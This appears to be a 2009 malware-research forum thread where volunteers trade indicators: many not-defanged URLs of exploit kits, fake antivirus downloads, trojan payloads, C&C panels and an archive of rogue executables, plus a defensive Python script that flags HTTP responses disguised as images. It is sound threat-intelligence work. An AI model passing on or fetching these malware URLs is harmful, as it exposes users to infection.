download.desktoprepairpackage.com/secure/3e448f5c3098045f42569da80c168ea7/49b6f34a/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.desktoprepairpackage.com/secure/9417212421c1fb9821e530ddbd2b7c34/49b6f21e/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
dlmaldef09.com/maldef09/install.php?track_id=10232
drebopoer.com/embded/mess_add.txt
drebopoer.com/embded/online.php?id=444884634282223285838277238378&country=United%20States
drebopoer.com/embded/redirect_fake.txt
drebopoer.com/embded/search_fid.txt
drebopoer.com/kept.exe
firstgate.ru/stat/404.php
firstgate.ru/stat/flash.php
firstgate.ru/stat/getexe.php?h=11
firstgate.ru/stat/traff.php
gowayscan.com/?uid=12405
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hayboxiw.cn/nuc/exe.php
hayboxiw.cn/nuc/index.php
hs.3-46.zlkon.lv/40E8000879B9FABC48B65F576C0000014166000000007600000177EB00053059300FA4
ipredator.ru/7/in.cgi?3
ipredator.ru/7/in.cgi?default
in4co.com/cki.php?uid=12405
in4ik.com/download/InternetAntivirusPro.exe
litedownloadseek.cn/in.cgi?cocacola25
litedownloadseek.cn/in.cgi?cocacola26
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/n2by3ywf/404.php
pakras.com/n2by3ywf/flash.php
pakras.com/n2by3ywf/getexe.php?h=11
pakras.com/n2by3ywf/info.php
pakras.com/n2by3ywf/pdf.exp.php
pakras.com/ntmx13a5/404.php
pakras.com/ntmx13a5/flash.php
pakras.com/ntmx13a5/info.php
pakras.com/ntmx13a5/pdf.exp.php
reddii.ru/traffic/sploit1/?130ybabVxtxdd
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=pdf
reddii.ru/traffic/sploit1/getfile.php?f=vispdf
rotateonads.com/files/1000.exe
rotateonads.com/files/MPh.exe
sexbases.cn/gr.php
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
strhq.cn/tds_a/go.php?id=2
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/load.php?id=3
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/answer.html
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/newsstop.html
thehugetitstop.cn/s/in.cgi?5
thehugetitstop.cn/soundthis.html
tombak-story.com/images/pics/system/load.php?id=33577
tombak-story.com/images/pics/system/pdf.php?id=33577
tombak-story.com/images/pics/system/index.php
tozxiqud.cn/in.cgi?2
tozxiqud.cn/in.cgi?4
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
traf.asia/stat.php
trypetstore.cn/file1.exe
trypetstore.cn/in.php
trypetstore.cn/nop/tds2.php
trypetstore.cn/robo/f/123.exe
trypetstore.cn/robo/files/tasks/AC
trypetstore.cn/robo/robo.php?r=1
trypetstore.cn/robo/robo.php?r=4
trypetstore.cn/robo/robo.php?r=5
trypetstore.cn/robo/robo.php?r=6
trypetstore.cn/sploits/pdf.php?id=2
usa.amerika.by/1.exe
vpsspeedin.ru/1/in.php
vpsspeedin.ru/1/load.php?id=3
vpsspeedin.ru/1/pdf.php
www.abdomains.cn/multi/bact.php
www.abdomains.cn/multi/bcmd.php
www.abdomains.cn/multi/checkupdate.php
www.abdomains.cn/multi/dirlist.php
www.abdomains.cn/multi/filelist.php
www.abdomains.cn/multi/getemails.php
www.abdomains.cn/multi/isho.txt
www.abdomains.cn/multi/takida.txt
z.lovertoorcn.cn/cp/l/5/bb810243e44b3a69d8de712f1976a635
z.lovertoorcn.cn/cp/r/5/bb810243e44b3a69d8de712f1976a635
z.lovertoorcn.cn/cp/t
zatura.cn/prohit/demon.bin
zatura.cn/prohit/source.php
zatura.cn/sad/demo.exe
zlzu.ru/damma/index.php
zlzu.ru/damma/load.php
xoomer.alice.it/hogroves/file.exe
xoomer.alice.it/hogroves/InternetAntivirusPro.exe
e.see-something.cn/m/l/0/3d4f38cb2f508d50c37678cfffb60492
e.see-something.cn/m/l/3/7d9b68a88bc55148e1ab6f92be144574
e.see-something.cn/m/l/4/c30eebe3a7c0158a45a4f3966ffd2216
e.see-something.cn/m/l/6/74a2593a472f17e2e0a7f5be342b2371
e.see-something.cn/m/r/0/3d4f38cb2f508d50c37678cfffb60492
e.see-something.cn/m/r/3/7d9b68a88bc55148e1ab6f92be144574
e.see-something.cn/m/r/4/c30eebe3a7c0158a45a4f3966ffd2216
e.see-something.cn/m/r/6/74a2593a472f17e2e0a7f5be342b2371
e.see-something.cn/m/t
www.microsoft.com.v6.update.js.status200.should-be.cn/
www.microsoft.com.v6.update.js.status200.should-be.cn/ar.cn
www.microsoft.com.v6.update.js.status200.should-be.cn/m/l/13/aa3119ba7581b0bf3e5b4b3c7eb63f63
www.microsoft.com.v6.update.js.status200.should-be.cn/m/l/18/93aeb808d1c98aee14aef249486f1430
www.microsoft.com.v6.update.js.status200.should-be.cn/m/r/13/aa3119ba7581b0bf3e5b4b3c7eb63f63
www.microsoft.com.v6.update.js.status200.should-be.cn/m/r/18/93aeb808d1c98aee14aef249486f1430
www.microsoft.com.v6.update.js.status200.should-be.cn/m/t
www.microsoft.com.v6.update.js.status200.should-be.cn/p/o/o.php?2
www.microsoft.com.v6.update.js.status200.should-be.cn/st6.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/forum.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/index.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/javac.php
Just some playing around stuff, nothing too serious. ;)
-
Looks like a long night for me. ;) You did that on MWR some weeks ago. I had a lot of fun for a whole day. :)
-
...Santa Claus is coming to town...
;D
-
hxxp://239.by.ru
hxxp://4r.by.ru
hxxp://666-project.by.ru
hxxp://adminmail.by.ru
hxxp://ahf.by.ru
hxxp://ak-sh.by.ru
hxxp://aster2005.by.ru
hxxp://autolg.by.ru
hxxp://avsimirc.by.ru
hxxp://beliy-medved.by.ru
hxxp://belsoch.by.ru
hxxp://belsurgery.by.ru
hxxp://big-mass.by.ru
hxxp://bulkin.by.ru
hxxp://ekaterininskay-shcool.by.ru
hxxp://extreme-ski.by.ru
hxxp://hrunsky.by.ru
hxxp://lakkmus.by.ru
hxxp://liceysk.by.ru
hxxp://margotour.by.ru
hxxp://medievalmusic.by.ru
hxxp://misham.by.ru
hxxp://muric.by.ru
hxxp://normforum.by.ru
hxxp://ochakovo.by.ru
hxxp://ondeep.by.ru
hxxp://poxe.by.ru
hxxp://rbook.by.ru
hxxp://rushops.by.ru
hxxp://sfchgu.by.ru
hxxp://team-sleep.by.ru
hxxp://testpoligon.by.ru
hxxp://thp8.by.ru
hxxp://wraith-pony.by.ru
hxxp://www.gvozd.by.ru
Now let's see to whom supposedly "all of the bases are belong to...", heh... I say in return, 1 IP to rule them all:
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
-
CM_MWR brought me up in a good mood (as he usually does),
so I thought of sharing the joy with others as well... ;)
http://www.google.com/search?hl=en&q=%22Index+of+%2F%22+mhstchk.php
-
Has been a few moons, hasn't it? ;D
-
Open dir, these are the ones that caught my attention though...
hxxp://glush.by.ru/agang.jar
http://www.virustotal.com/analisis/b50e6d91d682919f664d1b412fe51e7b
hxxp://glush.by.ru/settlers.jar
http://www.virustotal.com/analisis/0d4e1b9b172ba3663b2d5aeb8b39d3d2
========================
hxxp://javacsript.net/index/in.cgi?5
http://wepawet.iseclab.org/view.php?hash=237b6aae1fd55cb5517943b187f43488&t=1237979819&type=js
--->
hxxp://newsantimalware.com/412/
hxxp://newsantimalware.com/412/iepdf.php?f=new
hxxp://newsantimalware.com/412/load.php
---> Result: 5/40 (12.50%) :
http://www.virustotal.com/analisis/38b38ade6b7d019c5d0aa2f7c6f937d7
========================
hxxp://ayurvedaservicesindia.we.bs
http://wepawet.iseclab.org/view.php?hash=9f43c950049303a60e3755f92a9f07d1&t=1237981067&type=js
hxxp://extraspray.com/in.php?
hxxp://agkt.info/evo/count.php?o=7
========================
hxxp://drmituayurvedatreatments.we.bs
http://wepawet.iseclab.org/view.php?hash=761f6eb37181b4c5221f4b98340e194d&t=1237981408&type=js
hxxp://ftp.shmurge.com/get.php?id='
hxxp://stat.zima07.ru
hxxp://get.zima07.ru/pdf.php?acc=1
hxxp://get.zima07.ru/swf.php
hxxp://ftp.zima07.ru/run.php
hxxp://get.load-flash.com/out.php?click
There might be more crap on the same IP, haven't checked that though...
http://www.bfk.de/bfk_dnslogger_en.html?query=66.40.56.10#result
-
AV fraud:
goscanfull.com
redirects in the end to:
http://fusescan4.com/download/install.php
goscanplan.com
redirects in the end to:
http://wayscan4.com/download/install.php
this IP is full of AV fraud domains..
http://www.bfk.de/bfk_dnslogger_en.html?query=78.159.101.27#result
-
hxxp://ghthchinalimited.com.cn/admin/controller.php?action=bot&entity_list=
hxxp://turokgame.cn/bm/controller.php?action=bot&entity_list=
hxxp://attmyjoker.com/if/index.php
-
Waledac:
http://bestjournalguide.com/run.exe
http://urbanfear.com/run.exe
http://globalantiterror.com/run.exe
Redirects to exploits:
paintball2.by.ru
http://wepawet.iseclab.org/view.php?hash=8e522d049a6411492d6ddea2013a3c47&t=1238017604&type=js
Contains an iframe of the PDF exploit:
http://29ka.by.ru/
http://wepawet.iseclab.org/view.php?hash=5ba619da85a609ec2942b6e0417a728b&t=1238018761&type=js
the PDF exploit:
http://expresstv.co.il/un/pdf.php
http://wepawet.iseclab.org/view.php?hash=98a40fb7fd2a5a04cb12d788d2c4665c&t=1238018870&type=js
the trojan he downloads:
http://expresstv.co.il/un/load.php
http://www.virustotal.com/analisis/8f452239eb342ba3decd28a6ff241465
AV fraud:
vistastabilitynow.com
vistastabilitynow.net
scanalertspage.com
onlinescanservice.com
getscanonline.com
bestfiresfull.com
fuckmoneycash.com
yourstabilitysystem.com
popularpcscan.com
mostpopularscan.com
scanvistanow.net
-
the trojan he downloads:
What happens if it's a transsexual piece of malware??? :D
-
I will change it to "it" for all the feminists here :P
-
Redirect to exploits:
http://baltstroi-spb.by.ru
http://wepawet.iseclab.org/view.php?hash=d99f501d81c87b6e690fcd9147b6118e&t=1238072608&type=js
redirect to exploits:
http://hotjob.by.ru
http://wepawet.iseclab.org/view.php?hash=dd67f744942bd4dfb62ca592269c85f7&t=1238072560&type=js
exploits and Waledac trojan in the end at:
http://dolpassgiven.ru/3/pdf.php
http://dolpassgiven.ru/3/load.php?id=3
http://www.virustotal.com/analisis/88095c3f38020917145ca045f5adbc60
http://anubis.iseclab.org/?action=result&task_id=120a06c16ed33fec4b9fb4b2a80db328e&format=html
-
Redirects to exploits:
http://vniic.by.ru
http://wepawet.iseclab.org/view.php?hash=8578df10b9d0f8b53bb43a7b193b68c4&t=1238083841&type=js
exploits/Trojan Waledac:
http://dasretokfin.com/include/spl.php
http://wepawet.iseclab.org/view.php?hash=d8ebd3a3d6bf7c41126a81b490f96294&t=1238084290&type=js
http://dasretokfin.com/load.php
http://www.virustotal.com/analisis/c91540f8abbf3f49e981edb486790a25
---------------------------------------------
Redirects to exploits:
http://rootastic.by.ru
http://wepawet.iseclab.org/view.php?hash=94d6673b07ddb8e91f85b0885415ab56&t=1238083887&type=js
Redirects to exploits:
http://gav-posad.by.ru
http://wepawet.iseclab.org/view.php?hash=a137e822fc9460ba0006c09b97c5483e&t=1238084673&type=js
Redirects to exploits:
http://fastfood.by.ru
http://wepawet.iseclab.org/view.php?hash=0f14d3e37ad232de59cd7b7b686486ae&t=1238085115&type=js
Redirects to exploits:
http://nemiroff.by.ru
http://wepawet.iseclab.org/view.php?hash=5a96bc55863a40a5cbc20e87fda449b7&t=1238087155&type=js
Redirects to exploits:
http://kkff.by.ru
http://wepawet.iseclab.org/view.php?hash=61bf7c4aae87094f6ff6d3b9b419f130&t=1238087090&type=js
Redirects to exploits:
http://amirag.by.ru
http://wepawet.iseclab.org/view.php?hash=67052be5d4655c2ee3aca176fde97b25&t=1238087608&type=js
-
Redirects to exploits:
http://vniic.by.ru
http://rootastic.by.ru
http://gav-posad.by.ru
http://fastfood.by.ru
http://nemiroff.by.ru
http://kkff.by.ru
http://amirag.by.ru
All of them are at the same host :
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0
Who has time to check more domains from this IP?
http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result
-
That's what I've been doing in the last few days :)
Think I covered like 70% :P
-
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://rifnasax.cn/nuc/exe.php
may be offline
http://livestats.co.cc/script.js
-
http://krona98.biz/opi/
http://wepawet.cs.ucsb.edu/view.php?hash=03236ee924ddc9d03c2f11d176e3775c&t=1238262446&type=js
http://krona98.biz/opi/load.php?id=4
http://www.virustotal.com/analisis/0f51acface4b59ccc14b48cd92beaaac 1/39
VBA32 3.12.10.1 2009.03.27 Worm.Win32.AutoRun.oik
-
http://ru98.biz/cgi-bin/wtsin.cgi?id=4
http://krona98.biz/ins/index.php
http://krona98.biz/myy/cache/readme.pdf
http://krona98.biz/myy/cache/flash.swf
http://krona98.biz/myy/load.php?id=4
http://krona98.biz/myy/load.php?id=5
-
rogue:
http://systemsecuritytool.com
http://system-tuner.net
http://getpcguard.com
http://systemsecurityonline.com
exploits+trojan:
http://blufda.com/
http://wepawet.iseclab.org/view.php?hash=9f5b70106e995d5f7a4e842f54cc3c29&t=1238414305&type=js
-
http://216.12.168.138/1/getexe.php?h=11
http://216.12.168.138/1/getfile.php?f=pdf
http://216.12.168.138/1/helper.xml
http://66.90.101.177/ldr/files/part.exe
http://66.90.101.177/ldr/files/minisvr4.exe
http://66.90.101.177/ldr/files/zchMiB.exe
http://basesrv.net/base/install.lib
http://basesrv.net/base/ntdll.exe
http://basesrv.net/bin/in.php
http://basesrv.net/bin/load.php?id=1
http://basesrv.net/bin/load.php?id=6
http://basesrv.net/bin/pdf.php
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0&cc=0
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0&cc=0&cc=0
http://basesrv.net/update/delcache.exe
http://basesrv.net/update/load.exe
http://basesrv.net/update/loader_del.exe
http://basesrv.net/update/svchost.exe
http://bestfindahome.cn/findmeale.html
http://bestfindahome.cn/home.html
http://bestfindahome.cn/searchn.html
http://bizoplata.ru/monitoring.html
http://bizoplata.ru/onservice.html
http://bizoplata.ru/pay.html
http://nameashop.cn/in.cgi?income13
http://newsantimalware.com/720/load.php
http://nikodomain.info/in/init.php
http://pakras.com/c6p7fnqd/404.php
http://pakras.com/c6p7fnqd/flash.php
http://pakras.com/c6p7fnqd/getexe.php?h=11
http://pakras.com/c6p7fnqd/info.php
http://pakras.com/c6p7fnqd/pdf.exp.php
http://pakras.com/las/3rkour.dat
http://pakras.com/las/mp.dat
http://pakras.com/las/tos.dat
http://rec.bestrevenue.net/get_93.php?p=148
http://rec.bestrevenue.net/get_93.php?p=152
http://rec.bestrevenue.net/get_93.php?p=155
http://rec.bestrevenue.net/get_93.php?p=156
http://rec.bestrevenue.net/get_93.php?p=157
http://rec.bestrevenue.net/get_93.php?p=162
http://reddii.ru/traffic/sploit1/?263bYYYbaYtbt
http://reddii.ru/traffic/sploit1/getexe.php?h=11
http://reddii.ru/traffic/sploit1/getfile.php?f=swf
http://rifnasax.cn/nuc/exe.php
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://sadcwed.hostindianet.com/cache/flash.swf
http://sadcwed.hostindianet.com/cache/readme.pdf
http://sadcwed.hostindianet.com/index.php
http://teleporn.net/fix.exe?id=EB52EAEE-B8A4-45F1-AE06-1918472E1B0D
http://teleporn.net/rep.php?id=EB52EAEE-B8A4-45F1-AE06-1918472E1B0D
http://teleporn.net/stat/cache/flash.swf
http://teleporn.net/stat/cache/readme.pdf
http://teleporn.net/stat/index.php
http://teleporn.net/stat/load.php?id=0
http://teleporn.net/stat/load.php?id=4
http://ultradant.cn/dis9/index.php
http://ultradant.cn/dis9/load.php
http://zzzz.hostindianet.com/load.php?id=0
http://zzzz.hostindianet.com/load.php?id=4
http://66.90.101.177/ldr/files/minisvr4.exe
http://66.90.101.177/ldr/files/part.exe
http://66.90.101.177/ldr/files/zchMiB.exe
http://74.55.52.170/p1212/2.0/w.bin?226179
http://92.62.101.118/40E8001430303030303030303030303030303030303031306C0000003766000000007600000642EB0005302663788C
http://92.62.101.118/40E8001430303030303030303030303030303030303031306C0000016666000000007600000642EB0005301D414F5C
http://94.247.2.122/2.gif?nocache=0.3735362
http://94.247.2.122/2.gif?nocache=0.9495566
http://94.247.2.122/2.gif?nocache=1.401764E-02
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/china.cn/
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/l/15/02c9be1ab189280058cd0585b0abebc8
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/l/3/275eefe4b40b934bedd87eb81b293bfd
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/r/15/02c9be1ab189280058cd0585b0abebc8
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/r/3/275eefe4b40b934bedd87eb81b293bfd
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/t
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/g/g.php?1
forwrd.h15.ru/
forwrd.h15.ru/g/ch.gif?funnyst8
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/13/85cd1675de836a8cbe767019adf63929
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/15/6e107936d7e25cee0060e938e9b23a2a
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/3/fa49ddccad9bc56cd081c69078d04b8e
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/13/85cd1675de836a8cbe767019adf63929
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/15/6e107936d7e25cee0060e938e9b23a2a
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/3/fa49ddccad9bc56cd081c69078d04b8e
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/t
oligarh.territory.ru.b3675abf54988eef.axa3.cn/elanguage.cn/
oligarh.territory.ru.b3675abf54988eef.axa3.cn/g/g.php?1
-
exploits/trojan:
pro100biz.cn/yes/index.php
http://wepawet.iseclab.org/view.php?hash=56cb05532164e0c797b9860ec0bd7f9b&t=1238446331&type=js
-
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
-
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
already added some days ago. ;)
http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50
-
Sorry :'(
Rootkit TDSS
http://91.207.61.180/images/138/v3/file.exe
http://kxc-softwaresportal.com/promo.exe
http://updateserver.info/loads/traff.exe
http://updateserver.info/loads/instcash.exe
http://f-o-r.ms/xpre.tmp
http://f-o-r.ms/xrun.tmp
Mebroot
http://1681online.com/ld/dx/
http://wepawet.cs.ucsb.edu/view.php?hash=79ec6e02b38cad246c44c87dbeb4c2c6&t=1238508047&type=js
Rogue on Google Code, like:
http://sunbeltblog.blogspot.com/2009/03/google-code-site-used-as-malware.html
http://vlrm.googlecode.com/svn/trunk/
http://ultra-av.googlecode.com/svn/trunk/
Refpron
http://174.133.72.250/p1212/2.0/w.bin
http://mnnz.biz/ar/
http://mnnz.biz/ar/exe.php
-
f-o-r.ms -> seems we've got a jackpot here, heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
-
Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
;)
-
Lol, Bluetack is pretty much one of the best English-speaking malware-hunting forums out there,
but it doesn't really get the attention that it should from the security community, unfortunately... :(
-
f-o-r.ms -> seems we've got a jackpot here, heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
;)
Ok, Marcel Heler and friends. Well known. ;)
-
Hi everyone, I'm a newbie here. Just want to say hi!
I really like this site and I'm embarrassed that I didn't start to appreciate it sooner.
Anyway, on a daily basis I run across all sorts of crazy stuff, and I'm sure you do too. This bizarre little goodie just flashed on my screen, so I thought I'd post it here to see what ya think. ???
POST / HTTP/1.0
TagId: xxxxxxxxxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: search.namequery.com
Content-Length: 15
Pragma: no-cache
Via: 1.1 localhost:80 (squid)
Cache-Control: max-age=259200
Connection: keep-alive
~G.....p...o.\~HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Type: image/jpeg
Content-Length: 553
Connection: Close
TagId: xxxxxxxxxxx
~. ....MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
Any insight would be appreciated :)
The binary is attached.
-
"binary3" unfortunately seems to be download-corrupted, i.e. it's not a valid executable...
Did you grab it via a POST request?
-
"binary3" unfortunately seems to be download-corrupted, i.e. it's not a valid executable...
Did you grab it via a POST request?
No, I pulled it from a pcap. Yeah, I noticed that it's broken; the squid proxy likely killed it. What I find bizarre is that it's a POST request, and the server responded by pushing down an apparent binary with a Content-Type of image/jpeg. This isn't exactly normal behaviour. Does anyone have anything on the domain "search.namequery.com"?
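An added example (not from the poster, and not the attached binary) of how a capture like the one above can be triaged automatically: parse the raw HTTP/1.x response, sniff the body's magic bytes, compare them with the declared Content-Type, flag a body that is shorter than its Content-Length (which is what a proxy abort like the "binary3" case looks like on the wire), and for an MZ body check that e_lfanew actually points at a PE signature. The three sample responses are constructed here; only the header layout is borrowed from the IIS reply quoted above, and the MZ/PE stub is a skeleton, not a real executable.

```python
"""Added example: triage a captured HTTP response whose body contradicts
its Content-Type. Sample responses are constructed; only the header shape
matches the search.namequery.com reply quoted above."""
from typing import Optional

# Leading bytes -> the MIME type the body really belongs to.
MAGIC = [
    (b"MZ", "application/x-dosexec"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF8", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"%PDF", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
]


def sniff(body: bytes) -> str:
    """Return the MIME type implied by the body's magic bytes, or 'unknown'."""
    for magic, mime in MAGIC:
        if body.startswith(magic):
            return mime
    return "unknown"


def parse_response(raw: bytes):
    """Split raw HTTP/1.x response bytes into (status line, headers, body).
    Header names are lower-cased; the body is returned untouched."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def check_response(raw: bytes) -> dict:
    """Compare declared vs. sniffed type, detect truncation, and for an MZ body
    verify that e_lfanew (offset 0x3c) points at a 'PE\\0\\0' signature."""
    _, headers, body = parse_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff(body)
    result = {
        "declared": declared,
        "actual": actual,
        "mismatch": actual != "unknown" and declared != "" and actual != declared,
        "truncated": False,
        "has_pe_header": False,
    }
    clen = headers.get("content-length", "")
    if clen.isdigit() and len(body) < int(clen):
        result["truncated"] = True          # proxy cut the transfer short
    if body.startswith(b"MZ") and len(body) >= 0x40:
        e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
        result["has_pe_header"] = body[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return result


def build_response(content_type: str, body: bytes, content_length: Optional[int] = None) -> bytes:
    """Constructed sample: same header layout as the IIS reply quoted above."""
    if content_length is None:
        content_length = len(body)
    head = (
        "HTTP/1.0 200 OK\r\n"
        "Server: Microsoft-IIS/6.0\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {content_length}\r\n"
        "Connection: Close\r\n"
        "TagId: xxxxxxxxxxx\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + body


def fake_pe_stub(size: int) -> bytes:
    """Constructed MZ/PE skeleton (not a real binary): DOS header, e_lfanew -> 0x80,
    a PE signature there, zero padding up to the requested size."""
    hdr = bytearray(b"MZ" + b"\x90" * 0x3A)        # 0x3c bytes of DOS header
    hdr += (0x80).to_bytes(4, "little")            # e_lfanew
    hdr += b"\0" * (0x80 - len(hdr))
    hdr += b"PE\0\0"
    return bytes(hdr) + b"\0" * (size - len(hdr))


# Three constructed captures: a complete EXE labelled image/jpeg, the same one cut
# off at 100 bytes with the original Content-Length kept (as a proxy abort leaves
# it), and an honest JPEG for comparison.
SAMPLE_COMPLETE = build_response("image/jpeg", fake_pe_stub(553))
SAMPLE_TRUNCATED = build_response("image/jpeg", fake_pe_stub(553)[:100], content_length=553)
SAMPLE_JPEG = build_response("image/jpeg", b"\xff\xd8\xff\xe0" + b"\0" * 20)

if __name__ == "__main__":
    for name, raw in [("complete", SAMPLE_COMPLETE), ("truncated", SAMPLE_TRUNCATED), ("jpeg", SAMPLE_JPEG)]:
        print(name, check_response(raw))
```

Run it as-is to see the three verdicts; in practice the raw bytes would come from the reassembled TCP stream of the pcap rather than from build_response. A "mismatch" hit on a POST response is the signal the poster noticed; "truncated" tells you whether the sample is worth submitting anywhere before you spend time on it.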
-
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223
-
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223
Ok, this is generated by a program called "Computrace" by Absolute Software. It's laptop "LoJack" software.
-
Zbot, domain on MDL but different path this time:
http://amnepofig.ru/test/config.bin
http://amnepofig.ru/test/loader.exe
-
hxxp://bublik.biz/in.cgi?2 // Newer domain hosted over at 88.198.48.247...
Redirects to ->
hxxp://cximnik.cn/img2/index.php // Already spotted in previous days... PDF exploits, etc.
= = = = = = = = = = = = = = = = =
hxxp://basesrv3.net/update/main.exe
Result: 9/40 (22.5%):
http://www.virustotal.com/analisis/bc75d1265dcad80564f03cfb3cc1e1ae
-
Exploit/Trojan:
murka-best.com/include/spl.php
http://wepawet.iseclab.org/view.php?hash=f6e9a5645ca288e481b17453d05491d0&t=1238524847&type=js
Trojan:
luks5.cn/unique/1.exe
http://www.virustotal.com/analisis/9cec63d35bafded6092bee37132e6e0a
-
hxxp://213.155.6.33/new/controller.php?action=bot&entity_list=
One more C&C server in the same netblock; 213.155.6.32 was already spotted a couple of days ago...
hxxp://213.155.4.82/new/controller.php?action=bot&entity_list=
C&C server; 213.155.4.80 was also spotted earlier in the same netblock...
For sparsha - as I know he has a special preference for fake AVs... :)
hxxp://pornorawa.com
hxxp://sys-scan-1.biz
hxxp://sys-scanner-1.biz/download.php?page=
hxxp://www.system-protector.net/
Few more fake AVs...
hxxp://pcsolutionshelp.com/
hxxp://download.pcsolutionshelp.com/secure/fb4b4716a45f37c3694efcab0d41ee69/49d376e5/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
hxxp://malwareremovingtool.com/
hxxp://download.malwareremovingtool.com/secure/ab3dc06cc30452c69f2a70caf88d36bb/49d376e5/AntiMalwareGF_Rezer.exe
hxxp://download.malwareremovingtool.com/ -> Open dir... have fun ;-)
-
http://www.megaupload.com/?d=8L92M1AS
Just in case they take notice of it quickly and fix the directory read permissions,
I've archived the contents of download.malwareremovingtool.com:
58 MB archive containing 22 executables, no password needed...
-
Exploits/trojan
http://megabot.cn/index.php
http://wepawet.iseclab.org/view.php?hash=a95957a8b26780652b9900b284787dbc&t=1238602058&type=js
Redirects to exploits:
http://loskut.cn/cotton.html
http://wepawet.iseclab.org/view.php?hash=286bf4c04744e908b56a31102a09ac69&t=1238590602&type=js
http://ufomany.by.ru
http://wepawet.iseclab.org/view.php?hash=fdb7fd5376b78cb765a7c9611b9bd053&t=1238595797&type=js
Zbot:
http://211.95.79.114/load/ldr.exe
http://www.virustotal.com/analisis/3800cd2ec6b09e059fcbe102d7e54b39
-
List I was working on before I had my memory loss. ???
http://amnepofig.ru/test/loader.exe
http://www.mydataporch.com/bot.exe
http://www.cplnn.com/bbot.exe
http://web.cplnn.com/mmf32.exe
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/podmena.exe
http://edwardhomepage.info/172.exe
http://edwardhomepage.info/88.exe
http://edwardhomepage.info/adv.exe
http://edwardhomepage.info/podmena.exe
http://usabreakingnews.com/172.exe
http://usabreakingnews.com/88.exe
http://usabreakingnews.com/adv.exe
http://usabreakingnews.com/fuck3.exe
http://tmr-unlimited.com/172.exe
http://tmr-unlimited.com/setup.exe
http://tmr-unlimited.com/adv.exe
http://tmr-unlimited.com/fuck3.exe
http://tryithere.net/fuck3.exe
http://tryithere.net/88.exe
http://tryithere.net/l.exe
http://tryithere.net/adv.exe
http://tri-visionhomes.com/im/172.exe
